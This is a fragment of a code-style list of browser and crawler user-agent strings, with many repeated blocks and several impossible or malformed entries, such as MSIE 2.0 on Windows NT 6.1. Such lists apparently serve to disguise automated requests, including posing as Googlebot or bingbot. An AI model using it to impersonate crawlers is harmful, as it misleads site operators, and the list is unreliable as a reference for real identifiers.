'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
